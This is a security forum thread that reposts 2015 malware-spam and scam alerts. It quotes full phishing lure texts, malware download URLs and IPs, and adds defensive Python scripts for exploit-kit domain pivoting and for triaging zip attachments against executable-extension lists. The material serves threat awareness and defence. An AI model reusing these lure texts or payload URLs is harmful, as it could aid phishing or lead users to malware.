- http://myonlinesecurity.co.uk/invoice-pd-will-comm-word-doc-or-excel-xls-spreadsheet-malware/
28 April 2015 : Orion_PD_INV_12138.doc - Current Virus total detections: 4/54* downloads & executes http ://muebleseviajan .com/62/927.exe ..."
* https://www.virustotal.com/en/file/cc3012425784e128224efcd0f4bf237d33cd0b65deeb53241e39c00c56917197/analysis/1430207999/
muebleseviajan .com: 185.14.56.96: https://www.virustotal.com/en/ip-address/185.14.56.96/information/
___
Bad Actor using Fiesta exploit kit
- https://isc.sans.edu/diary.html?storyid=19631
2015-04-28 - "... a criminal group using the Fiesta exploit kit (EK) to infect Windows computers... The group is currently using a gate that generates traffic from compromised websites to a Fiesta EK domain. I'm calling this group the "BizCN gate actor" because all its gate domains are registered through Chinese registrar www .bizcn .com, and they all reside on a -single- IP address... Earlier this month, the BizCN gate actor changed its gate IP to 136.243.227.9 [3]. We're currently seeing the gate lead to Fiesta EK on 205.234.186.114. Below is a flow chart for the infection chain:
> https://isc.sans.edu/diaryimages/images/2015-04-28-ISC-diary-image-01.jpg
... Passive DNS on 136.243.227.9 shows at least 100 domains registered through www .bizcn .com hosted on this IP address. Each domain is paired with a -compromised- website... Since their information is now public through this diary entry, the actor will likely change the gate's IP address and domains again. Unless there's a drastic change in their pattern of operations, this BizCN gate actor will be found relatively soon after any upcoming changes..."
[3] http://urlquery.net/search.php?q=136.243.227.9
205.234.186.114: https://www.virustotal.com/en/ip-address/205.234.186.114/information/
136.243.227.9: https://www.virustotal.com/en/ip-address/136.243.227.9/information/
___
Fake 'NatWest' SPAM – chm malware
- http://myonlinesecurity.co.uk/natwest-secure-message-jp-morgan-access-secure-message-rbs-re-incident-im03359643-chm-malware/
28 Apr 2015 - "'NatWest Secure Message' pretending to come from NatWest .co.uk <secure.message@ natwest .com> with a zip attachment that extracts to a malicious chm (windows help file) is another one from the current bot runs... The email looks like:
You have received a secure message.
Read your secure message by opening the attachment, SecureMessage.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 3532.
First time users – will need to register after opening the attachment...
There is also a separate set of emails being spammed out with the -same- malware attachment with a subject of 'JP Morgan Access Secure Message' pretending to come from JP Morgan Access <service@ jpmorgan .com>...
Please check attached file(s) for your latest account documents regarding your online account.
Russel Whitlock
Level III Account Management Officer
817-267-1542 office
817-573-8940 cell
Russel.Whitlock@ jpmorgan .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
2015 JPMorgan Chase & Co...
All of these use random names at the relevant banks...
Update: there is a second set of these being spammed out with a plain chm attachment that is -not- inside a zip. Outlook (and some other email clients) block chm files by default so you will be protected from automatically opening or running this.
Today's Date: SecureMessage.zip: Extracts to: SecureMessage.chm
Current Virus total detections: 1/53*. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/467f6d76802014ab671fa868b9b81b79497889f906c434620742e391aee17670/analysis/1430217439/
SecureMessage.chm
___
Fake 'BACS payment' SPAM – PDF malware
- http://myonlinesecurity.co.uk/sales-hello-please-find-downloaded-notification-of-your-bacs-payment-from-essex-county-council-fake-pdf-malware/
28 Apr 2015 - "An email saying 'Please find downloaded notification of your BACS payment from Essex County Council' with a subject of 'Hello (your email address)' pretending to come from sales with a zip attachment is another one from the current bot runs... The email looks like:
Please find downloaded notification of your BACS payment from Essex County Council.
If you require further information please refer to the contact details in the attached document.
BACS Remittance Advice generated automatically by 2e2 on behalf of Essex County Council.
Paramat 60
85 rue des jacobins
60740 Saint maximin
Tel : 03.44.66.03.47
28 April 2015: Random Attachment zip name: Extracts to: INVOICE.exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/817bf392cf2a10fee49ff72c04f03ae8ccfa15f434c6cca75a247cc5ca725f07/analysis/1430219199/
... Behavioural information
TCP connections
166.78.246.145: https://www.virustotal.com/en/ip-address/166.78.246.145/information/
81.7.109.65: https://www.virustotal.com/en/ip-address/81.7.109.65/information/
188.255.252.242: https://www.virustotal.com/en/ip-address/188.255.252.242/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Fake 'Email Locked' SPAM - contains trojan
- http://blog.mxlab.eu/2015/04/28/email-issue-243061763d7f320-account-735811402519-temporarily-locked-contains-trojan/
Apr 28, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “ Account #735811402519 Temporarily Locked”. Different spoofed addresses are used as the from email address and with each email, the content and the attached trojan are -different- to avoid detection by virus engines. Some examples:
Dear user,
We detect unauthorized Login Attempts to your ID #735811402519 from other IP Address.
Please re-confirm your identity. See attached docs for full information.
Evie Maccarter
King Yvonne M Dr
70 Exhibition Street, Kentville, NS B4N 4K9
CANADA
902-602-7131
The attached file 735811402519.zip contains the 102 kB large file 735811402519.scr. The trojan is known as UDS:DangerousObject.Multi.Generic, Heur.I or Trojan.Win32.Qudamah.Gen.3. At the time of writing, 3 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/7c71b6d7318f3754af51b1795cd5190b1e35a40db1862eec9e3600da46de13d7/analysis/1430215524/
___
Scammy Nepal earthquake donation requests
- https://isc.sans.edu/diary.html?storyid=19635
2015-04-28 - "... like after every major hurricane or earthquake, the miscreants around the globe are currently scurrying to set up their -fake- charities and web pages, in order to solicit donations. The people of Nepal certainly can use our help and generosity to deal with the aftermath of the April 25 earthquake, but let's make sure the money actually ends up there. For our readers in the US, USAID.gov maintains a list of charities that they work with in Nepal at http://www.usaid.gov/nepal-earthquake .. but note how even USAID adds a disclaimer to be on the lookout for scams!..."
:fear: :mad:
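The ISC diary above describes the pivot that makes the BizCN gate actor trackable: one hosting IP shared by all gate domains, all registered through the same registrar, and a fixed chain of compromised site, gate, exploit-kit server. The script below is an added example for this thread (not ISC's or the diary author's code) that performs that pivot on passive-DNS rows and then correlates a proxy log to find which internal hosts walked the whole chain. The two IP addresses are the ones the diary names; the domains, registrar field, passive-DNS rows and proxy-log lines are constructed.

```python
"""Pivot from one known gate IP to its sibling domains, then find which
internal hosts travelled compromised site -> gate -> exploit-kit server.

Added example for this thread; it is not ISC's or the diary author's code.
The two IP addresses are the ones the diary names; the domains, the registrar
field, the passive-DNS rows and the proxy-log lines are all constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

GATE_IP = "136.243.227.9"
EK_IP = "205.234.186.114"

# Constructed passive-DNS rows: (domain, resolved_ip, registrar)
PDNS = [
    ("gate-one.example", GATE_IP, "bizcn.com"),
    ("gate-two.example", GATE_IP, "bizcn.com"),
    ("gate-three.example", GATE_IP, "bizcn.com"),
    ("tenant.example", GATE_IP, "other-registrar.example"),   # co-hosted, unrelated
    ("news.example", "198.51.100.20", "other-registrar.example"),
]

# Constructed proxy log: timestamp client dest_host dest_ip referer
PROXY_LOG = """\
2015-04-28T10:01:02 10.0.0.7 compromised-blog.example 203.0.113.5 -
2015-04-28T10:01:03 10.0.0.7 gate-two.example 136.243.227.9 http://compromised-blog.example/post.html
2015-04-28T10:01:04 10.0.0.7 ek-landing.example 205.234.186.114 http://gate-two.example/
2015-04-28T10:05:00 10.0.0.9 gate-one.example 136.243.227.9 http://another-site.example/
2015-04-28T10:07:11 10.0.0.12 news.example 198.51.100.20 -
"""

_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")


def sibling_domains(records, ip, registrar=None):
    """Domains that resolved to `ip`, optionally limited to one registrar
    (the diary's pivot: same hosting IP plus same registrar)."""
    return sorted({d for d, r_ip, reg in records
                   if r_ip == ip and (registrar is None or reg == registrar)})


def infection_chains(log_text, gate_domains, ek_ip):
    """Per client, the first gate request followed later by a request to the EK IP.
    Returns {client: {'compromised_site', 'gate', 'ek_host'}}."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if m:
            events[m.group(2)].append(m.groups())  # (ts, client, host, ip, referer)
    chains = {}
    gate_domains = set(gate_domains)
    for client, rows in events.items():
        rows.sort()  # ISO-8601 timestamps sort chronologically as strings
        gate_hit = next((r for r in rows if r[2] in gate_domains), None)
        if gate_hit is None:
            continue
        ek_hit = next((r for r in rows if r[3] == ek_ip and r[0] > gate_hit[0]), None)
        if ek_hit is None:
            continue  # reached the gate but never the EK: worth a look, not a chain
        chains[client] = {
            "compromised_site": urlparse(gate_hit[4]).hostname or "unknown",
            "gate": gate_hit[2],
            "ek_host": ek_hit[2],
        }
    return chains


if __name__ == "__main__":
    gates = sibling_domains(PDNS, GATE_IP, registrar="bizcn.com")
    print("gate domains to block:", gates)
    for client, chain in infection_chains(PROXY_LOG, gates, EK_IP).items():
        print(client, chain)
```

The registrar filter matters: a shared hosting IP will carry unrelated tenants, and blocking every domain on it produces false positives, which is why the diary pairs the IP with the registrar before calling a domain part of the gate set.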
AplusWebMaster
2015-04-29, 13:03
FYI...
Fake 'pictures' SPAM - malware
- http://myonlinesecurity.co.uk/here-are-some-pictures-malware/
29 Apr 2015 - "An email saying 'Here are some pictures' with a subject of 'RE: Hello' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hello!
Here are some pictures !!
See you later!
29 April 2015: in_my_home.zip: Extracts to: in_my_home.scr
Current Virus total detections: 7/55*. Automatic analysis at MALWR shows it to be a Zeus banking Trojan. Creates a windows hook that monitors keyboard input (keylogger), creates Zeus (Banking Trojan) mutexes, mutex: MPSWabDataAccessMutex, creates an Alternate Data Stream (ADS) file: C:\WINDOWS\system32\commtui2.exe:Zone.Identifier, Installs itself for autorun at Windows startup... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5eeac9e8d3e8ede6e5a8269a9ba4962ee26335ff30e73c838cdb73675eb7283c/analysis/1430289254/
___
JavaScript malware
- http://myonlinesecurity.co.uk/javascript-malware/
29 Apr 2015 - "JavaScript malware is a different way of spreading malware. We have been seeing a steady increase in a different form of malware spreading. The bad guys are sending javascript files inside a zip or at the end of a link. We have seen several different email templates for this method ranging from:
- E-Ticket 7694892 pretending to come from E-Ticket <online@ ticket .com>
> http://myonlinesecurity.co.uk/e-ticket-7694892-american-airlines-e-ticket-services-javascript-malware/
- Order 595775 which contains a simple email reading something like “Good Day! Find Order 595775 attached Thank you Jim Olsen” These also come in as -fake- invoices with random numbers and random names and senders. You normally find the name in body of email matches the name of the alleged sender.
These particular js files (JavaScript malware) download & install a cryptowall 3.0 malware which will encrypt all your files on the computer and prevent access to them. There is absolutely -no- fix once you are infected so it is essential to have a full working backup and make sure it is stored off the computer. These cryptowall Trojans are -network- aware and will -encrypt- -all- -network- disks and external hard discs as well as the computer hard disc.
All the alleged senders, companies, names of employees and phone numbers mentioned in the emails are all innocent and are just picked at random. Some of these companies will exist and some won’t. -Don’t- try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking-the-link in the email to see what is happening... The basic rule is NEVER open -any- attachment to an email, unless you are expecting it..."
- http://blogs.cisco.com/security/talos/cryptowall-3-0
___
Fake 'HSBC credit' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-credit-terms-from-hsbc-fake-pdf-malware/
29 Apr 2015 - "'New credit terms from HSBC' coming from random names at random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Sir/Madam,
We are pleased to inform you that our bank is ready to offer you a bank loan.
We would like to ask you to open the Attachment to this letter and read the terms.
Yours faithfully,
Global Payments and Cash Management
HSBC
29 April 2015: mail2.zip: Extracts to: Payment.exe
Current Virus total detections: 1/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/76428876027d4d96f1365d35a05612e56c8da14ec6f30dd8ad29765eee20f1f5/analysis/1430307499/
___
Incoming MMS Spam
- http://threattrack.tumblr.com/post/117690961748/incoming-mms-spam
Apr 29, 2015 - "Subjects Seen
Incoming mms from +07452136643
Typical e-mail details:
No.: +07452136643
Size: 8971
ID: OHB.45598A07E.7385
Filename: OHB.45598A07E.7385.cab
Billie Souto
Malicious File Name and MD5:
OHB.45598A07E.7385.scr (d2843ca1919e48c16c98673210e0c3d2)
Screenshot: https://41.media.tumblr.com/bc77a6325bca8c0a3ae49c17e4918587/tumblr_inline_nnkp06rrby1r6pupn_500.png
Tagged: MMS, ctb locker
___
Fake Chinese domain SCAMs
- http://blog.dynamoo.com/2015/04/cnwebregistrycn-chinaygregistrycom-scam.html
29 Apr 2015 - "This spam email is actually part of a long-running Chinese scam.
From: Jim Bing [jim.bing@ cnwebregistry .cn]
Date: 29 April 2015 at 14:27
Subject: Re:"[redacted]"
Dear CEO,
(If you are not the person who is in charge of this, please forward this to your CEO, because this is urgent, Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China.
We received an application from Huayu Ltd on April 27, 2015. They want to register " [redacted] " as their Internet Keyword and " [redacted] .cn "、" [redacted] .com.cn " 、" [redacted] .net.cn "、" [redacted] .org.cn " domain names etc.., they are in China domain names. But after checking it, we find " [redacted] " conflicts with your company. In order to deal with this matter better, so we send you email and confirm whether this company is your distributor or business partner in China or not?
Best Regards,
Jim
General Manager
Whoever "Huayu Ltd" are is irrelevant, as they aren't actually interested in registering these domains, even if they exist. Instead, this is an attempt by a -rogue- Chinese domain registrar to get you to buy -overpriced- and -worthless- domains. In this case the spam mentions the domain cnwebregistry .cn, but chinaygregistry .com is also on the same server and will be similarly fraudulent. This video I made a while ago explains the scam in more detail..."
(Video @ the dynamoo URL above.)
:fear::fear: :mad:
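Most of the lures quoted in this thread come down to one trick: a zip whose single entry is an executable (.exe, .scr, .js, .chm) wearing a document icon or a double extension such as "Privacy Policy.doc.scr", so that with extensions hidden it reads as a PDF or Word file. The script below is an added example for this thread (not code from any of the quoted blogs) showing how a mail gateway can triage such an archive by name and by leading bytes, so a PE file is caught even when it has been renamed to .pdf, which goes one step beyond the icon spoofing the posts describe. The extension lists are illustrative policy, and the archive it builds is constructed: the entry names echo lures quoted above, the contents are dummy bytes.

```python
"""Triage of a zip e-mail attachment the way a mail gateway might do it.

Added example for this thread, not code from any of the quoted blogs.
Assumptions: the extension lists are illustrative policy, and the archive
built by build_sample_zip() is constructed; its entry names echo lures quoted
above but the contents are dummy bytes, not the real samples.
"""
import io
import zipfile

# Names Windows hands straight to a program loader or script host.
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
            ".vbs", ".vbe", ".wsf", ".hta", ".chm", ".jar", ".msi", ".ps1"}
# What a hidden-extension lure pretends to be ("Privacy Policy.doc.scr").
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def extensions(name):
    """All dotted suffixes of a file name, lower-cased: 'x.doc.scr' -> ['.doc', '.scr']."""
    base = name.rsplit("/", 1)[-1].lower()
    return ["." + p for p in base.split(".")[1:]]


def content_kind(head):
    """Classify a file by its leading bytes rather than by its name."""
    if head.startswith(b"MZ"):
        return "pe"            # Windows executable regardless of what it is called
    if head.startswith(b"%PDF"):
        return "pdf"
    if head.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole"           # legacy .doc/.xls container
    if head.startswith(b"ITSF"):
        return "chm"
    return "other"


def triage_zip(data):
    """Return {entry_name: [reasons]}; an empty list means nothing was flagged."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            exts = extensions(info.filename)
            last = exts[-1] if exts else ""
            with zf.open(info) as fh:
                kind = content_kind(fh.read(8))
            reasons = []
            if last in EXEC_EXT:
                reasons.append(f"executable extension {last}")
            if len(exts) >= 2 and exts[-2] in DOC_EXT and last in EXEC_EXT:
                shown = info.filename[: -len(last)]
                reasons.append(f"double extension; shows as '{shown}' when extensions are hidden")
            if kind == "pe" and last not in EXEC_EXT:
                reasons.append("PE header under a non-executable name")
            if kind == "chm" and last != ".chm":
                reasons.append("compiled HTML help content under another name")
            report[info.filename] = reasons
    return report


def blocked_entries(data):
    """Names the gateway would quarantine."""
    return sorted(name for name, reasons in triage_zip(data).items() if reasons)


def build_sample_zip():
    """Constructed archive standing in for the attachments quoted above."""
    pe_stub = b"MZ" + bytes(62)          # DOS header magic only; not a runnable file
    entries = {
        "car-repairs.exe": pe_stub,
        "Privacy Policy.doc.scr": pe_stub,
        "Order 595775.js": b"var a = 1;\n",
        "SecureMessage.chm": b"ITSF" + bytes(28),
        "report.pdf": pe_stub,            # executable renamed to look like a document
        "statement.pdf": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in triage_zip(build_sample_zip()).items():
        print(f"{name}: {'; '.join(reasons) or 'no findings'}")
```

The icon itself is not inspected here; reading the PE resource table to see whether an .exe carries an Acrobat or Word icon is possible but not needed, because anything with an executable extension or an MZ header is already quarantined before the icon matters.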
AplusWebMaster
2015-04-30, 14:54
FYI...
Fake 'Telephone order' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2015/04/malware-spam-rebecca-mcdonnell.html
30 Apr 2015 - "This fake financial email is not from Gas Cylinders UK but is instead a simple -forgery- with a malicious attachment.
From: Rebecca McDonnell [rebecca@ gascylindersuk .co .uk]
Date: 30 April 2015 at 09:54
Subject: Telephone order form
Telephone order form attached
Regards,
Rebecca McDonnell
Business Administrator
340a Haydock Lane, Haydock Industrial Estate,
St Helens, Merseyside, WA11 9UY
DDI: 01744 304338
Fax: 01942 275 312 ...
There is a malicious Word document attached with the name TELEPHONE PURCHASE ORDER FORM.doc which probably comes in a few different variants, but the one I saw had a VirusTotal detection rate of 4/56* and contained this malicious macro... which downloaded a component from the following location:
http ://morristonrfcmalechoir .org/143/368.exe
This is saved as %TEMP%\serebok2.exe and has a detection rate of 8/56**. Analysis tools are a bit patchy today, but the VirusTotal report indicates traffic to:
212.227.89.182 (1&1, Germany)
The Malwr report reported a dropped Dridex DLL with a detection rate of 3/55***."
* https://www.virustotal.com/en/file/3ff341262900d33574bab920f9d7f15a21db3f6c4a931e17dbaabd09d3c5fd71/analysis/1430390792/
** https://www.virustotal.com/en/file/6ccd4c74673dde8c75e26b99ba87b7afedfcf4b90336bafbb2c662211877cd82/analysis/1430390534/
*** https://www.virustotal.com/en/file/29ed0520277d94f50fe39d893da883952ccb74d588574799040bfc813bc08f0b/analysis/1430392218/
- http://myonlinesecurity.co.uk/telephone-order-form-rebecca-mcdonnell-word-doc-or-excel-xls-spreadsheet-malware/
30 Apr 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Telephone-order-form.png
30 April 2015 : TELEPHONE PURCHASE ORDER FORM.doc - Current Virus total detections: 4/55*
... which downloads and runs nishatdairy .com/143/368.exe which is saved as %Temp%\serebok3.exe and autoruns (virus Total**)..."
* https://www.virustotal.com/en/file/10e55770ea40c6910f5cf484438a30874c3a994d7df65cbe8a1c1460efb34e8c/analysis/1430379008/
** https://www.virustotal.com/en/file/6ccd4c74673dde8c75e26b99ba87b7afedfcf4b90336bafbb2c662211877cd82/analysis/1430379609/
___
Fake 'Statement' SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-of-account-fake-pdf-malware/
30 Apr 2015 - "'Statement of Account 5905779365764954' (random number) coming from random names and email addresses with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Statement-of-Account-5905779365764954.png
30 April 2015 : random name : Extracts to: statement.exe | Account_info.exe | Docs_23131445.exe
Current Virus total detections: 1/55* |1/55** | 1/55*** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bd682c0a99ce6fa4e0c2a0857d6b29e74c1e1b49d01d36e3adf8876c22499702/analysis/1430384002/
** https://www.virustotal.com/en/file/a446d5f72aceae8b24946b1dc86e6dbd3ac8b514953b6c19bd7ebd20da75ba8a/analysis/1430384014/
*** https://www.virustotal.com/en/file/1da90a80b6bbe8deda021c3073f7714ebb500ef693f05e4b67700bef0dc7d508/analysis/1430384178/
___
Fake 'Amended Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/attached-amended-invoice-115784-re-dn-103674-9415-word-doc-or-excel-xls-spreadsheet-malware/
30 Apr 2015 - "'Attached Amended Invoice 115784 Re D/N 103674. 9/4/15' pretending to come from accounts@ procterscheeses .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email body is totally -blank-. This contains exactly the -same- malware as today’s earlier spam run of malicious word docs Telephone order form – Rebecca McDonnell — word doc or excel xls spreadsheet malware*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/telephone-order-form-rebecca-mcdonnell-word-doc-or-excel-xls-spreadsheet-malware/
___
Nepal Earthquake Disaster - Email Scams
- https://www.us-cert.gov/ncas/current-activity/2015/04/30/Nepal-Earthquake-Disaster-Email-Scams
April 30, 2015 - "... potential email scams regarding the earthquake in Nepal. The scam emails may contain links or attachments that may direct users to phishing or malware infected websites. Phishing emails and websites requesting donations for -fraudulent- charitable organizations commonly appear after these types of natural disasters..."
:fear::fear: :mad:
AplusWebMaster
2015-05-01, 14:12
FYI...
Fake 'Invoice' SPAM - doc/xls malware attached
- http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60022446-344-word-doc-or-excel-xls-spreadsheet-malware/
1 May 2015 - "'Berendsen UK Ltd Invoice 60022446 344' pretending to come from donotreply@ berendsen .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Berendsen-UK-Ltd-Invoice-60022446-344.png
1 May 2015 : IRN001610_60022446_I_01_01.doc - Current Virus total detections: 2/56*
... which connects to & downloads laurelwoodvirginia .com/654/46.exe which is saved as %temp%\serebok5.exe and -autoruns- on your computer (virus Total**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7f9ad5e44e357130fd8dcfdceb01342b011106d41b92a92792b950882a938187/analysis/1430472222/
** https://www.virustotal.com/en/file/e7c6153b40dd6e57cc3d2516a0fcc8d65a33559eb266bc211ba0514915972818/analysis/1430476073/
... Behavioural information
___
Fake 'Claim' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/copy-of-claim-passed-for-consideration-to-hm-courts-ref-word-doc-or-excel-xls-spreadsheet-malware/
1 May 2015 - "'Copy of claim passed for consideration to HM Courts Ref: [random numbers] from [random companies]' coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like this, but be aware that every email will have a -different- random claim number and -different- company listed as the claimant:
SOVEREIGN MINES OF AFRICA PLC has issued the claim against you and passed for consideration to HM Courts Ref:[EK8013GUH].The claim was read, and passed to the second reading. For these or other notarial acts, or the legalising of documents, please contact SOVEREIGN MINES OF AFRICA PLC as soon as posible.
So far I have seen:
- Copy of claim passed for consideration to HM Courts Ref:[EK8013GUH] from SOVEREIGN MINES OF AFRICA PLC
- Copy of claim passed for consideration to HM Courts Ref:[UK1751MQV] from FALKLAND OIL & GAS
- Copy of claim passed for consideration to HM Courts Ref:[EI6841DHZ] from BREEDON AGGREGATES LTD
- Copy of claim passed for consideration to HM Courts Ref: from WILLIAM HILL PLC
- Copy of claim passed for consideration to HM Courts Ref:[FZ8349DFN] from GAZPROM OAO
- Copy of claim passed for consideration to HM Courts Ref:[WY4077WQJ] from Hardy Amies Ltd
- Copy of claim passed for consideration to HM Courts Ref:[GX0331SJB] from Nathaniel Lichfield and Partners
25 February 2015 : EI6841DHZ.doc | EK8013GUH.doc | UK1751MQV.doc
Current Virus total detections: 0/56* | 0/56** | 0/56***
... at least one of these macros downloads from pastebin .com/download.php?i=XEKaxHCg and verifed. acgfamilyoffices. com/ebn/logo.jpg (so far I have not been able to get the content but am still trying)..."
* https://www.virustotal.com/en/file/3237dc9e4c04859a0834e6813f5c520b68c1657a5ddf3312e650ae028aff8341/analysis/1430477322/
** https://www.virustotal.com/en/file/d7a1daf2a29a92373098aebfa4e3ce029b378e6e9de7edd5ce9c9f398801530d/analysis/1430477337/
*** https://www.virustotal.com/en/file/99fd744bf923907d01d92a445b80abfb0cb6bacde5a485a89011486eb4ef589f/analysis/1430477346/
- http://blog.mxlab.eu/2015/05/01/email-copy-of-claim-passed-for-consideration-to-hm-courts-contains-malicious-word-file/
May 1, 2015
> https://www.virustotal.com/en/file/369089330844a7b2ac152ea2207b076123ee07f9d098d024ce67fc8bc016fd89/analysis/1430480904/
File name: ZI2444LQN.doc
Detection ratio: 0/56
___
Fake 'Delivery confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/delivery-confirmation-form-for-purchase-bw91149jya-from-300415-word-doc-or-excel-xls-spreadsheet-malware/
1 May 2015 - "'Delivery confirmation form for purchase BW91149JYA [random numbers]' from 30/04/15 coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please fill out the attached form and return it to us.
Best regards, Antonia Lang
The name in the body of the email matches the alleged sender. The purchase number in the subject matches the attachment name. The malware payload is exactly the -same- as the payload in today’s earlier spam run of malicious word docs 'Copy of claim passed for consideration to HM Courts Ref:...' – word doc or excel xls spreadsheet malware*. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/copy-of-claim-passed-for-consideration-to-hm-courts-ref-word-doc-or-excel-xls-spreadsheet-malware/
:fear: :mad:
AplusWebMaster
2015-05-04, 20:36
FYI...
Fake 'Unaccepted account' SPAM – PDF malware
- http://myonlinesecurity.co.uk/holded-account-notification-unaccepted-account-caution-fake-pdf-malware/
4 May 2015 - "An email coming from random senders and random email addresses with subjects of 'Holded account notification' or 'Unaccepted account caution' or similar vaguely banking related subjects with a zip attachment is another one from the current bot runs... Some subjects seen with this series of spam emails are:
Blocked bank operation report
Holded account notification
Unaccepted account caution
Rejected operation warning
Blocked transaction warning
Some attachment names are:
block_warning_information.zip
nullfication_alert_details.zip
rejection_message_data.zip
rejection_notification_form.zip
invalidation_alert_document.zip
The email looks like:
Be noted that your depositis rejected.
Please see the report for detailed information.
Susan Morgan
Account Security Department
-Or-
Be adviced that your payment not accepted.
Please see the document for detailed information.
Mary Roberts
Senior Manager
-Or-
We inform you that your fund not accepted.
Please look the document for detailed information.
Jane Jones
Senior Manager
4 May : block_warning_information.zip | nullfication_alert_details.zip
Extracts to: block_warning_report.exe | abrogation_warning_information.exe
Current Virus total detections: 1/55* | 1/55** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2af59e5d0157d9874c3372d950256f0de401ab86af61a750fa99e297f1d0bbc1/analysis/
... Behavioural information
** https://www.virustotal.com/en/file/9937ae20432cac5eb0c5531233331c3a5f626cada84b02bfa822bc233d53110a/analysis/1430748957/
... Behavioural information
- https://isc.sans.edu/diary.html?storyid=19657
2015-05-05
___
ACH Spam
- http://threattrack.tumblr.com/post/118138846488/ach-spam
May 4, 2015 - "Subjects Seen:
ACH Approval Letter
Typical e-mail details:
The Automated Clearing House (ACH) application for your company has been processed and the payer unit number assigned is 029762. This number identifies to the Federal Reserve Bank of Cleveland the account to be debited and is required input in the “ABI ACH Payment Authorization Input Record.” It is the responsibility of the payer to use the correct payer unit number in every transaction in which statements are paid via ACH.
You may begin paying statements via ACH. If you are a Customhouse broker who is using ACH for the first time, please contact your ABI client representative to request that your ABI records be updated to permit ACH filing. If you are already using ACH for other importer statement transmissions, you do not need to contact your ABI client representative. If you are a new ABI importer, please contact your ABI client representative to ensure that the appropriate ABI records are updated to permit you to transmit entry summaries, which will be filed under ACH...
If you have any questions, you may contact ACH Help Desk at (317) 298-1200, extension 1098.
Sincerely,
Cindi Miller, Chief
Collections Refunds and Analysis Branch
Revenue Division
Thank You,
Kirsten Anderson
Malicious File Name and MD5:
ACH_Import_Information.scr (bc7bb730e98fcde7044251784e0d8ceb)
Tagged: ACH, Upatre
___
Macro Malware: Old Tricks still Work ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/macro-malware-when-old-tricks-still-work-part-1/
May 4, 2015 - "Now comes a time when we are reminded of why this security warning prompt in Microsoft Word matters:
Microsoft Word security warning for macros:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/Figure01.jpg
... We’ve already seen signs of macro malware in the threat landscape a year ago with the W97M_SHELLHIDE.A and TSPY_ZBOT.DOCM combination. At first, we thought that it was just a chance encounter but, as covered in our recent report on BARTALEX, the method of distributing malware through the misuse of macros has borne the likes of DRIDEX, ROVNIX and VAWTRAK into computer systems from the latter part of 2014 up to this year. What’s more, we noticed that this resurgence of macro malware has a single area of focus: enterprises. Enterprises were heavily affected by a spam outbreak involving macro malware. We saw that macro malware detections in Q1 2015 drove huge numbers:
Q1 2015 MS Word and Excel malware detections:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/Figure-2.jpg
This data is based on feedback from Trend Micro’s Smart Protection Network, representing files that have been detected on endpoints. The following conclusions can be drawn:
